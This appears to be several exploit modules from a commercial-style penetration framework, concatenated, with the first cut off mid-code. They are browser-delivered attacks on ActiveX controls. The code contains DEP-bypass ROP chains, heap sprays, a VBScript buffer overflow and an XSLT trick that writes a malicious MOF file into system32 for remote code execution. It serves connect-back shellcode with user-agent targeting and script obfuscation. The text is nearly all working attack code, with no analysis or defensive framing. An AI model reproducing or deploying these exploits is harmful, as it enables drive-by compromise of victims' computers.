DWORD PTR DS:[EDX],EAX depSc += pack('<L', 0x10011A05) #POP EBX pop writeable depSc += pack('<L', 0x1003ef40) # depSc += pack('<L', 0x10022276) #POP EAX depSc += pack('<L', 0x1002D104) # Import Address depSc += pack('<L', 0x10011A06) # RET depSc += pack('<L', 0x10011A06) # RET depSc += pack('<L', 0x10021DA6) # CALL DWORD PTR DS:[EAX] depSc += pack('<L', 0x11111111) #SPACE depSc += pack('<L', 0x11111111) #SPACE depSc += pack('<L', 0x11111111) #SPACE depSc += pack('<L', 0x11111111) #SPACE depSc += pack('<L', 0x1001403B) # PUSH ESP, POP EDI, depSc += pack('<L', 0x90909090) depSc += pack('<L', 0x44444444) # Fix ESP depSc += pack('<L', 0x04eb9090) # Jmp over call depSc += pack('<L', 0x1002716A) # Call EDI depSc += self.shellcode filedata = """ <html> <object classid='clsid:0297D24A-F425-47EE-9F3B-A459BCE593E3' id='target'></object> <script language = 'vbscript'> buf = String(8293, "A") ret = unescape("%D9%C7%02%10") padsp = String(16, "a") sc = unescape("SHELLCODE") exploit = buf + ret + padsp + sc target.Get exploit </script> <html> """.replace('SHELLCODE', urlencode(depSc)) return filedata def makesploit(self, clientheader, clientbody): self.createShellcode() # The main call from ClientD from libs.spkproxy import header, body h = header('SERVER') b = body() self.log("WP> URL Received: %s" % clientheader.URL) user_agent = clientheader.getStrValue(['User-Agent']) self.log('WP> User agent of connecting host: %s' % user_agent) if clientheader.URL.count(self.filename): self.log('WP> Serving exploit file') data = self.makefile() if not data: return None, None b.setBody(data) h.addHeader('Content-Type', 'text/html') h.addHeader('Set-Cookie', 'SessionID=%d' % self.jsObfuscator.getXORKey()) else: self.log('WP> Redirecting to self') h.status = '302' h.addHeader('Location', self.filename) h.addHeader('Content-Type', 'text/html') return h, b def run(self): filedata = self.makefile() self.log("WP> Opening %s for output" % (self.filename)) fd = file(self.filename, 'wb+') fd.write(filedata) fd.close() self.log('WP> Wrote to %s' % (self.filename)) return 1
class theexploit(wp_exploit, httpclientside): ###################################################################################### ## WP> Dialog Information ##########################s############################################################ PAYLOADS=["IE Inject Connect Back", "HTTPMOSDEF SSL", "HTTPMOSDEF PLAIN", "Execute Command"] # Clienside exploits default to HTTPMosdef PLAIN for clientD DEFAULT_PAYLOAD = 2 def __init__(self): wp_exploit.__init__(self) httpclientside.__init__(self) self.setInfo(DESCRIPTION) self.setInfo(VERSION) self.name = NAME self.targets = targets self.version = 0 self.isClientD = False self.use_universal = True self.encode_printable = True self.alignstack = True self.badstring = "\x00\x09\x0a\x0b\x0c\x0d\x22\x5c" self.filename="".join( [ random.choice(string.uppercase) for x in range(8) ] ) #+ ".xml" self.jsObfuscator = JSObfuscator() self.jsObfuscator.xorKeyFromCookie("SessionID") self.vProtect = True self.useRawShellcode = True return def is_vulnerable(self, info_dict): # Called from ClientD, if recon modules are enabled # returns a value used to rank the exploit within attacking modules """ Check for IE """ self.isClientD = True if "Safari" in info_dict['user_agent']: self.log("WP> Target has Safari") language = info_dict['plugins'].get("language", "") if type(language)==type([]): language=language[0] # it's a list in actuality self.log("WP> language found: %s"%language) if "en-us" in language: return 95 else: return 20 return 0 def usage(self): self.wp_usage(targets,"-F <filename>") return def neededListenerTypes(self): self.getArgs() return self.wp_createWin32Listener() def createShellcode(self): self.getArgs() self.log('WP> Targeting version %d: %s'%(self.version,targets[self.version][0])) return self.wp_createShellcode() def getArgs(self): # If Called from clientD, update shellcode accordingly if getattr(self,'useSSLMOSDEF',False): self.isClientD = True self.DEFAULT_PAYLOAD = 1 else: # Potentially called from httpserver update shellcode accordingly if self.HTTPMOSDEF: if self.useSSLMOSDEF: self.DEFAULT_PAYLOAD = 1 else: self.DEFAULT_PAYLOAD = 2 # Selected shell options self.wp_getShellcodeType() # If called from clientD there will be no target here if self.target: self.host=self.target.interface self.filename=self.argsDict.get('filename',self.filename) return def displayVersions(self): for t in targets.keys(): print 'WP> Version %d: %s'%(t,targets[t][0]) return def makefile(self): myPElib = pelib.PElib() try: self.mosdeftrojan=myPElib.createPEFileBuf(self.shellcode) except Exception, err: self.log("WP> Problem building MOSDEF PE Trojan: %s"%(err)) self.setInfo("WP> %s attacking %s:%d - completed (failed!)"%(NAME,self.host,self.port)) return 0 self.mosdeftrojan = wp_GenerateMOF(self.mosdeftrojan) payloadFilename = "".join( [ random.choice(string.lowercase) for x in range(16) ] ) + '.mof' self.log("WP> Attempting Remote Code Execution via Wbem\Mof") filedata = '''<?xml-stylesheet type="text/xml" href="#fragment"?> <!DOCTYPE doc [ <!ATTLIST xsl:stylesheet id ID #REQUIRED >]> <doc> <mof> <location><![CDATA[\\\\.\\GLOBALROOT\\SystemRoot\\system32\\wbem\\mof\\MOF_FILENAME]></location> <content><![CDATA[MOF_PAYLOAD]]></content> </mof> <xsl:stylesheet id="fragment" version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:sx="http://icl.com/saxon" extension-element-prefixes="sx" xmlns="http://www.w3.org/1999/xhtml" > <xsl:output method="xml" indent="yes" /> <xsl:template match="/"> <xsl:variable name="moflocation" select="//mof/location/text()"/> <sx:output file="{$moflocation}" method="text"> <xsl:value-of select="//mof/content"/> </sx:output> <html> </html> </xsl:template> </xsl:stylesheet> </doc>''' filedata = filedata.replace('MOF_FILENAME', payloadFilename) filedata = filedata.replace('MOF_PAYLOAD', self.mosdeftrojan) return filedata
class theexploit(wp_exploit, httpclientside): ###################################################################################### ## WP> Dialog Information ##########################s############################################################ PAYLOADS=["IE Inject Connect Back", "HTTPMOSDEF SSL", "HTTPMOSDEF PLAIN", "Execute Command"] # Clienside exploits default to HTTPMosdef PLAIN for clientD DEFAULT_PAYLOAD = 2 def __init__(self): wp_exploit.__init__(self) httpclientside.__init__(self) self.setInfo(DESCRIPTION) self.setInfo(VERSION) self.name = NAME self.targets = targets self.version = 0 self.use_universal = True self.isClientD = False self.badstring = "\x00" #Ranomisze name for clientd self.filename="".join( [ random.choice(string.uppercase) for x in range(8) ] ) + ".html" # HTTP Custom Stuff self.jsObfuscator = JSObfuscator() self.jsObfuscator.xorKeyFromCookie("SessionID") return def is_vulnerable(self, info_dict): # Called from ClientD, if recon modules are enabled # returns a value used to rank the exploit within attacking modules """ Check for IE """ self.isClientD = True if "MSIE" in info_dict['user_agent']: self.log("WP> Target has MSIE") language = info_dict['plugins'].get("language", "") if type(language)==type([]): language=language[0] #it's a list in actuality self.log("WP> language found: %s"%language) if "en-us" in language: return 95 else: return 20 return 0 def usage(self): self.wp_usage(targets,"-F <filename>") return def neededListenerTypes(self): self.getArgs() return self.wp_createWin32Listener() def createShellcode(self): self.getArgs() self.log('WP> Targeting version %d: %s'%(self.version,targets[self.version][0])) return self.wp_createShellcode() def getArgs(self): # If Called from clientD, update shellcode accordingly if getattr(self,'useSSLMOSDEF',False): self.isClientD = True self.DEFAULT_PAYLOAD = 1 else: # Potentially called from httpserver update shellcode accordingly if self.HTTPMOSDEF: if self.useSSLMOSDEF: self.DEFAULT_PAYLOAD = 1 else: self.DEFAULT_PAYLOAD = 2 # Selected shell options self.wp_getShellcodeType() # If called from clientD there will be no target here if self.target: self.host=self.target.interface self.filename=self.argsDict.get('filename',self.filename) return def displayVersions(self): for t in targets.keys(): print 'WP> Version %d: %s'%(t,targets[t][0]) return def makefile(self): # Make the exploit file #Base filedata filedata="""<html><body> <object classid="clsid:39344399-FEF9-467E-835E-B994B021DEB6"></object> """ filedata += """<script language="JavaScript">""" #script code script = """ memory = new Array(); shellcode = unescape("SHELLCODE"); var heapspray = unescape("%u6e1f%u7c36%u10FD%u7c34"); var len= shellcode.length + 0x21; //0x21 is heap header while(heapspray.length < 0x120000) heapspray += heapspray; heapspray = heapspray.substring(0, 0x120000- length); depbypass = unescape("%u4cc2%u7c34") depbypass = depbypass + unescape("%u4cc2%u7c34") depbypass = depbypass + unescape("%u1920%u7c34") // POP ESI depbypass = depbypass + unescape("%ub2f8%u7c38") // 7c38b308-10 Value that points to a writeable ptr space depbypass = depbypass + unescape("%u7618%u7c34") // PUSH ESP,POP depbypass = depbypass + unescape("%u1111%u1111") // depbypass = depbypass + unescape("%ua458%u7c34") // VirtualAlloc depbypass = depbypass + unescape("%u1111%u1111") // depbypass = depbypass + unescape("%u1111%u1111") // depbypass = depbypass + unescape("%u1111%u1111") // depbypass = depbypass + unescape("%u1111%u1111") // depbypass = depbypass + unescape("%u07d0%u0000") // Size 7d0 depbypass = depbypass + unescape("%u1000%u0000") // Type depbypass = depbypass + unescape("%u0040%u0000") // Protect depbypass = depbypass + unescape("%u1111%u1111") // depbypass = depbypass + unescape("%u1111%u1111") // depbypass = depbypass + unescape("%u5c30%u7c34") // push esp,ret heapspray= heapspray + depbypass + shellcode; try{ for(var i = 0; i < 3000; i++) { memory[i]= heapspray.substring(0,heapspray.length); } } catch(err) {} """ script = script.replace('SHELLCODE',wp_urluencode(self.shellcode + ("\x00" * 100))) #Obfuscate the script code (disabled for this exploit) self.isClientD=False if self.isClientD: self.log("WP> Running jsObfuscator") filedata += self.jsObfuscator.obfuscate(script) else: filedata += script # Add the reset of the filedata filedata += """ </SCRIPT> <object classid="clsid:A2282403-50DE-4A2E-A118-B90AEDB1ADCC"></object> </body> </html> """ return filedata def makesploit(self,clientheader,clientbody): self.createShellcode() # The main call from ClientD from libs.spkproxy import header,body h=header('SERVER') b=body() self.log('WP> ****************************************') self.log("WP> URL Received: %s"%clientheader.URL) user_agent = clientheader.getStrValue(['User-Agent']) #self.log('WP> User agent of connecting host: %s' % user_agent) if clientheader.URL.count(self.filename): self.log('WP> Serving exploit file') data=self.makefile() if not data: return None,None b.setBody(data) h.addHeader('Content-Type','text/html') h.addHeader('Set-Cookie','SessionID=%d' % self.jsObfuscator.getXORKey()) else: self.log('WP> Redirecting to self') h.status='302' h.addHeader('Location',self.filename) h.addHeader('Content-Type','text/html') self.log('WP> ****************************************') return h,b def run(self): filedata=self.makefile() self.log("WP> Opening %s for output"%(self.filename)) fd=file(self.filename,'wb+') fd.write(filedata) fd.close() self.log('WP> Wrote to %s'%(self.filename)) return 1
class theexploit(wp_exploit, httpclientside): PAYLOADS = ["IE Inject Connect Back", "Execute Command"] DEFAULT_PAYLOAD = 0 def __init__(self): wp_exploit.__init__(self) httpclientside.__init__(self) self.setInfo(DESCRIPTION) self.setInfo(VERSION) self.name = NAME self.targets = targets self.version = 0 self.isClientD = False self.use_universal = True self.encode_printable = True self.alignstack = True self.badstring = "\x00\x09\x0a\x0b\x0c\x0d\x22\x5c" self.filename = "".join( [random.choice(string.uppercase) for x in range(8)]) + ".html" self.filename2 = "".join( [random.choice(string.uppercase) for x in range(8)]) + ".html" self.jsObfuscator = JSObfuscator() self.jsObfuscator.xorKeyFromCookie("SessionID") return def is_vulnerable(self, info_dict): """ Check for IE """ self.isClientD = True if "MSIE" in info_dict['user_agent']: self.log("WP> Target has MSIE") language = info_dict['plugins'].get("language", "") if type(language) == type([]): language = language[0] self.log("WP> language found: %s" % language) if "en-us" in language: return 95 else: return 20 return 0 def usage(self): self.wp_usage(targets, "-F <filename>") return def neededListenerTypes(self): self.getArgs() return self.wp_createWin32Listener() def createShellcode(self): self.getArgs() self.log('WP> Targeting version %d: %s' % (self.version, targets[self.version][0])) return self.wp_createShellcode() def getArgs(self): if getattr(self, 'useSSLMOSDEF', False): self.isClientD = True self.DEFAULT_PAYLOAD = 1 else: if self.HTTPMOSDEF: if self.useSSLMOSDEF: self.DEFAULT_PAYLOAD = 1 else: self.DEFAULT_PAYLOAD = 2 self.wp_getShellcodeType() if self.target: self.host = self.target.interface self.filename = self.argsDict.get('filename', self.filename) return def displayVersions(self): for t in targets.keys(): print 'WP> Version %d: %s' % (t, targets[t][0]) return def makefile(self, browser, osversion): if osversion == "Windows XP": if browser == "MSIE 7.0": self.log('WP> Serving Windows XP IE7 exploit') return self.makefileIE7_XP() self.log('WP> Invalid target') return def makefileIE7_XP(self): payload = "\x8B\xE0" # MOV ESP,EAX payload += "\x83\xC4\x05" # ADD ESP,05 payload += self.shellcode payload += wp_randomstring((5120 - len(payload))) filedata = """<html> <head> <script>""" script = wp_clientside_HeapLib(padding="%u0c0c") #script code script += """ var heap_obj = new heapLib.ie(0x20000); var nops = unescape("NOPS"); var code = unescape("SHELLCODE"); while (nops.length < 0x2000) nops += nops; var offset = nops.substring(0, 0x5F4); var shellcode = offset + code + nops.substring(0, 0x1000-code.length-offset.length); while (shellcode.length < 0x80000) shellcode += shellcode; var block = shellcode.substring(0, (0x80000-6)/2); heap_obj.gc(); for (var z=1; z < 0x300; z++) { heap_obj.alloc(block); } """ script = script.replace('SHELLCODE', wp_urluencode(payload)) script = script.replace('NOPS', wp_urluencode(pack('<L', 0x0c0c0c0c))) #Obfuscate the script code (disabled for this exploit) self.isClientD = False if self.isClientD: self.log("WP> Running jsObfuscator") filedata += self.jsObfuscator.obfuscate(script) else: filedata += script filedata += self.maketrigger() return filedata def maketrigger(self): filedata = """</script> <body> <object classid='clsid:E6ACF817-0A85-4EBE-9F0A-096C6488CFEA' id='target'></object> <script> target.StopModule(%s); </script> </body> </html> """ % ((0x0c0c0c0c / 0x134)) return filedata def makesploit(self, clientheader, clientbody): self.createShellcode() # The main call from ClientD from libs.spkproxy import header, body h = header('SERVER') b = body() self.log('WP> ****************************************') self.log("WP> URL Received: %s" % clientheader.URL) user_agent = clientheader.getStrValue(['User-Agent']) cookies = clientheader.getStrValue(['Cookie']) # Get details browser, osversion = wp_browserinfo(user_agent) self.log('WP> OSVersion: %s' % osversion) self.log('WP> Browser: %s' % browser) self.log('WP> ') if clientheader.URL.count(self.filename): data = self.makefile(browser, osversion) if not data: return None, None b.setBody(data) h.addHeader('Content-Type', 'text/html') h.addHeader('Set-Cookie', 'SessionID=%d' % self.jsObfuscator.getXORKey()) else: self.log('WP> Redirecting to self') h.status = '302' h.addHeader('Location', self.filename) h.addHeader('Content-Type', 'text/html') return h, b def run(self): self.log('WP> This module must be run via HTTPSERVER') return 0